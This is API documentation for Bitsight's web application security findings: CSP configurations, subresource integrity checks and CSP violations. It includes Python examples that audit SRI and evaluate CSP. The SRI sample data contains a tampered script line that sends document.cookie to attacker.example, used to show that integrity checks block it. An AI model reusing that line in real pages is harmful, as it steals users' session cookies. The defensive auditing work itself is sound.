Web Application Security Findings
https://api.bitsighttech.com/ratings/v1/companies/company_guid/findings?risk_vector=web_appsec
Get cross-site scripting evidence, including:
- Content Security Policy Configurations
- Cross-Domain Subresource Integrity Check
- Cross-Domain Subresource Integrity Failure
- CSP Violations
For details specific to Web Application Security, use the `?risk_vector=web_appsec` parameter. Other query parameters are listed in GET: Finding Details.
Content Security Policy Configurations
[assessmentName = cross_domain_subresource_integrity_check]
Example Response
```json
{
  "message": "'unsafe-inline' allows the execution of unsafe in-page scripts and event handlers.",
  "documentUrl": "url",
  "source": "header",
  "directive": "script-src",
  "value": [
    "'unsafe-inline'"
  ],
  "details": "",
  "cspSeverity": 10,
  "type": 301
}
```
Response Attributes
Field | Type | Description |
---|---|---|
message | String | A summary of the issue. |
documentUrl | String | The URL used to retrieve the CSP configuration. |
source | String | The location where the CSP configuration was loaded from (for example, `header`). |
directive | String | The CSP directive evaluated from a particular piece of evidence. |
value | Array | The value of the CSP directive. |
details | String | |
cspSeverity | Integer | The severity of the CSP directive that will be used for grading. |
type | Integer | The type of HTML resource. |
Cross-Domain Subresource Integrity Check
[assessmentName = cross_domain_subresource_integrity_check]
Example Response
```json
{
  "type": "link",
  "resource": "url",
  "hash": "Integrity attribute missing"
}
```
Response Attributes
Field | Type | Description |
---|---|---|
type | String | The type of HTML resource. |
resource | String | A link to the resource as defined in the web application. |
hash | String | The hash value present in the HTML element, or `Integrity attribute missing` when the element carries no `integrity` attribute. |
Cross-Domain Subresource Integrity Failure
[assessmentName = cross_domain_subresource_integrity_failure]
Example Response
```json
{
  "type": "Script",
  "resource": "url",
  "hash": "Failed to find a valid digest in the 'integrity' attribute for resource 'url' with computed SHA-256 integrity 'CdZ5YfsFUiC3gCJeUOvnoduGoxgDH0EugrrlwIuw+U4='. The resource has been blocked.",
  "resolution": "blocked"
}
```
Response Attributes
Field | Type | Description |
---|---|---|
type | String | The type of HTML resource. |
resource | String | A link to the resource as defined in the web application. |
hash | String | The hash value present in the HTML element, or the browser's error message when no digest in the `integrity` attribute matched the one computed for the fetched resource. |
resolution | String | |
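The two SRI evidence types above (an element with no `integrity` attribute, and a digest that does not match what the browser computed for the fetched body) can be reproduced locally before Bitsight reports them. The following is an added example in Python, not Bitsight's code: it scans a constructed HTML page for cross-origin `<script src>` and stylesheet `<link>` elements, computes the `sha256-`/`sha384-`/`sha512-` value the `integrity` attribute should carry, and emulates the browser's decision, including the case where `crossorigin` is absent and the opaque response cannot be verified. The document URL, page contents and CDN bodies are made up, and the `fetch` callable is injected so the audit runs offline.

```python
"""Cross-domain Subresource Integrity (SRI) audit.

Added example, not Bitsight code. Reproduces the two SRI outcomes documented
above ("Integrity attribute missing" and the browser's "Failed to find a valid
digest ..." block) for a constructed HTML page.
"""
import base64
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

ALGOS = ("sha256", "sha384", "sha512")       # order = strength, as in the SRI spec
_TOKEN = re.compile(r"^(sha256|sha384|sha512)-([A-Za-z0-9+/=]+)")  # '?options' suffix ignored


def integrity_value(body: bytes, algo: str = "sha256") -> str:
    """The value a correct integrity attribute would carry for this body."""
    return f"{algo}-" + base64.b64encode(hashlib.new(algo, body).digest()).decode()


def check_integrity(integrity, body: bytes):
    """Emulate the browser decision once the body has been fetched.

    Returns (resolution, detail); resolution is 'missing', 'allowed' or 'blocked'.
    """
    if not integrity:
        return "missing", "Integrity attribute missing"
    parsed = [(m.group(1), m.group(2)) for m in map(_TOKEN.match, integrity.split()) if m]
    if not parsed:
        # Only unknown algorithms: the spec says to behave as if no integrity was given.
        return "allowed", "no supported algorithm in integrity attribute; check skipped"
    # Browsers keep only the digests of the strongest algorithm present.
    strongest = max((algo for algo, _ in parsed), key=ALGOS.index)
    computed = integrity_value(body, strongest)
    for algo, digest in parsed:
        if algo == strongest and f"{algo}-{digest}" == computed:
            return "allowed", f"{strongest} digest matched"
    return "blocked", (f"Failed to find a valid digest in the 'integrity' attribute; "
                       f"computed {strongest} integrity '{computed.split('-', 1)[1]}'")


class _Subresources(HTMLParser):
    """Collect external <script src> and <link rel=stylesheet href> elements."""
    def __init__(self):
        super().__init__()
        self.items = []   # (type, reference, integrity attribute, has crossorigin attribute)

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.items.append(("Script", a["src"], a.get("integrity"), "crossorigin" in a))
        elif tag == "link" and "stylesheet" in (a.get("rel") or "").lower() and a.get("href"):
            self.items.append(("Link", a["href"], a.get("integrity"), "crossorigin" in a))


def _origin(url):
    u = urlparse(url)
    return (u.scheme, u.hostname, u.port)


def audit_html(document_url, html, fetch):
    """One record per cross-origin subresource, shaped like the evidence above.

    `fetch(url) -> bytes` is injected so the audit can run offline.
    """
    parser = _Subresources()
    parser.feed(html)
    records = []
    for kind, ref, integrity, has_crossorigin in parser.items:
        url = urljoin(document_url, ref)
        if _origin(url) == _origin(document_url):
            continue                      # same-origin resources are out of scope here
        if not integrity:
            resolution, detail = "missing", "Integrity attribute missing"
        elif not has_crossorigin:
            # Without CORS the response is opaque and the browser cannot verify it,
            # so the load fails even when the digest is right.
            resolution, detail = "blocked", "integrity set but no crossorigin attribute; opaque response cannot be verified"
        else:
            resolution, detail = check_integrity(integrity, fetch(url))
        records.append({"type": kind, "resource": url,
                        "hash": integrity or "Integrity attribute missing",
                        "resolution": resolution, "detail": detail})
    return records


# Constructed sample (not from the page): a document on www.example.com that loads
# a CDN library twice, once intact and once with injected code, plus a stylesheet.
DOCUMENT_URL = "https://www.example.com/"
LIB_BODY = b"console.log('hello from the CDN');\n"
SAMPLE_CDN = {
    "https://cdn.example.net/lib.js": LIB_BODY,
    "https://cdn.example.net/tampered.js": LIB_BODY + b"fetch('https://attacker.example/?c=' + document.cookie);\n",
}
GOOD = integrity_value(LIB_BODY)
SAMPLE_HTML = f"""
<script src="/app.js"></script>
<script src="https://cdn.example.net/lib.js" integrity="{GOOD}" crossorigin="anonymous"></script>
<script src="https://cdn.example.net/tampered.js" integrity="{GOOD}" crossorigin="anonymous"></script>
<script src="https://cdn.example.net/nocors.js" integrity="{GOOD}"></script>
<link rel="stylesheet" href="//cdn.example.net/theme.css">
"""


def sample_fetch(url):
    """Offline stand-in for an HTTP GET against the constructed CDN."""
    return SAMPLE_CDN[url]


if __name__ == "__main__":
    for rec in audit_html(DOCUMENT_URL, SAMPLE_HTML, sample_fetch):
        print(rec["resolution"].upper(), rec["type"], rec["resource"], "-", rec["detail"])
```

Running the block prints one line per cross-origin element: `lib.js` is allowed, `tampered.js` is blocked with the computed digest, `nocors.js` is blocked because the integrity cannot be checked on an opaque response, and `theme.css` is reported as `Integrity attribute missing`. The value to put in a real `integrity` attribute is produced the same way `integrity_value` does it (`openssl dgst -sha384 -binary lib.js | openssl base64 -A`), and the element must also carry `crossorigin="anonymous"`.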
CSP Violations
[assessmentName = csp_violation]
Example Response
```json
{
  "lineNumber": 165,
  "resolutionStatus": "blocked",
  "message": "Refused to load the script 'url' because it violates the following Content Security Policy directive: \"script-src 'self' 'unsafe-inline' 'unsafe-eval' https://*.youtube.com\". Note that 'script-src-elem' was not explicitly set, so 'script-src' is used as a fallback.\n",
  "resourceUrl": "url"
}
```
Response Attributes
Field | Type | Description |
---|---|---|
lineNumber | Integer | The line number in the source page. |
resolutionStatus | String | The action the browser took when loading the resource. |
message | String | A summary of the issue. |
resourceUrl | String | The resource URL that had the CSP violation. |
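Both CSP evidence types on this page, the weak directive values reported under Content Security Policy Configurations (for example `'unsafe-inline'` in `script-src`) and the browser-side violation above, come from the same policy semantics: a directive is parsed into a source list, `script-src-elem` falls back to `script-src` and then `default-src`, and a script load is allowed only if some source expression matches the resource. The following is an added example in Python, not Bitsight's code: it parses a serialized policy, flags weak script sources, and reproduces the violation decision for a script element, including the fallback note quoted in the evidence. The policies and URLs are constructed, and the host matching is a simplified CSP3 host-source match (scheme, host with a leading `*.` wildcard, explicit port) that ignores path components.

```python
"""Content-Security-Policy evaluation.

Added example, not Bitsight code. Flags weak script-src values and reproduces the
browser's CSP Violations decision for a <script src> load. Host matching is a
simplified CSP3 host-source match; paths are ignored.
"""
from urllib.parse import urlparse

# Constructed policies (not from the page): one weak, one hardened.
WEAK_CSP = ("default-src 'self'; "
            "script-src 'self' 'unsafe-inline' 'unsafe-eval' https://*.youtube.com; "
            "img-src *")
HARDENED_CSP = ("default-src 'self'; "
                "script-src 'self' 'nonce-r4nd0m' https://www.youtube.com; "
                "object-src 'none'; base-uri 'self'")

# Directive fallback order, as browsers apply it (CSP3).
FALLBACK = {
    "script-src-elem": ("script-src-elem", "script-src", "default-src"),
    "script-src-attr": ("script-src-attr", "script-src", "default-src"),
    "script-src": ("script-src", "default-src"),
}

WEAK_SCRIPT_SOURCES = {
    "'unsafe-inline'": "allows the execution of unsafe in-page scripts and event handlers.",
    "'unsafe-eval'": "allows eval() and other string-to-code sinks.",
    "*": "allows scripts from any origin.",
    "https:": "allows scripts from any https origin.",
    "data:": "allows scripts from data: URLs.",
}


def parse_csp(header: str) -> dict:
    """Serialized policy -> {directive: [source, ...]}; first occurrence of a directive wins."""
    policy = {}
    for token in header.split(";"):
        parts = token.split()
        if parts:
            policy.setdefault(parts[0].lower(), parts[1:])
    return policy


def effective_directive(policy: dict, directive: str):
    """The directive a browser actually consults, or None when nothing restricts it."""
    for name in FALLBACK.get(directive, (directive, "default-src")):
        if name in policy:
            return name
    return None


def weak_script_sources(policy: dict) -> list:
    """One record per weak value in the directive governing <script> elements,
    shaped like the Content Security Policy Configurations evidence."""
    directive = effective_directive(policy, "script-src-elem")
    if directive is None:
        return [{"directive": None, "value": None,
                 "message": "no script-src or default-src: scripts are unrestricted."}]
    values = policy[directive]
    nonce_or_hash = any(v.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-")) for v in values)
    findings = []
    for value in values:
        if value in WEAK_SCRIPT_SOURCES:
            msg = WEAK_SCRIPT_SOURCES[value]
            if value == "'unsafe-inline'" and nonce_or_hash:
                msg += " (ignored by CSP2+ browsers because a nonce/hash is present; still active in older ones.)"
            findings.append({"directive": directive, "value": value, "message": msg})
    return findings


def source_matches(source: str, resource: str, document: str) -> bool:
    """Does one source expression match the resource URL loaded from `document`?"""
    r = urlparse(resource)
    if source == "'self'":
        d = urlparse(document)
        return (r.scheme, r.hostname, r.port) == (d.scheme, d.hostname, d.port)
    if source.startswith("'"):
        return False                            # keywords, nonces and hashes never match a URL
    if source == "*":
        return r.scheme in ("http", "https", "ws", "wss")
    if source.endswith(":"):                    # scheme-source such as https: or data:
        return r.scheme == source[:-1].lower()
    s = urlparse(source if "://" in source else "//" + source)
    if s.scheme and s.scheme != r.scheme:
        return False
    host = s.hostname or ""
    if host.startswith("*."):                   # *.youtube.com matches www.youtube.com, not youtube.com
        if not (r.hostname or "").endswith(host[1:]):
            return False
    elif host != r.hostname:
        return False
    return s.port is None or s.port == r.port


def script_load_allowed(policy: dict, resource: str, document: str):
    """CSP decision for <script src=resource> on `document`: (allowed, message).
    The message mimics the console line recorded in the CSP Violations evidence."""
    directive = effective_directive(policy, "script-src-elem")
    if directive is None:
        return True, "no governing directive"
    if any(source_matches(src, resource, document) for src in policy[directive]):
        return True, f"allowed by {directive}"
    serialized = " ".join([directive] + policy[directive])
    note = ("" if directive == "script-src-elem"
            else f" Note that 'script-src-elem' was not explicitly set, so '{directive}' is used as a fallback.")
    return False, (f"Refused to load the script '{resource}' because it violates the "
                   f"following Content Security Policy directive: \"{serialized}\".{note}")


if __name__ == "__main__":
    doc = "https://www.example.com/"
    for label, header in (("weak", WEAK_CSP), ("hardened", HARDENED_CSP)):
        policy = parse_csp(header)
        print(f"[{label}] weak script sources:", [f["value"] for f in weak_script_sources(policy)])
        for url in ("https://www.youtube.com/iframe_api", "https://cdn.attacker.example/x.js"):
            print(f"[{label}]", script_load_allowed(policy, url, doc)[1])
```

For the weak policy the script-source check returns `'unsafe-inline'` and `'unsafe-eval'`, and a load from `cdn.attacker.example` is refused with the same fallback note the evidence above shows; for the hardened policy the weak-source list is empty and the same load is refused by `script-src` without reintroducing inline execution, because inline scripts are authorised by nonce instead.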
- May 15, 2024: Added `details` to Content Security Policy Configurations response.
- December 12, 2023: Included general finding details; added table of contents.
- August 11, 2023: Published.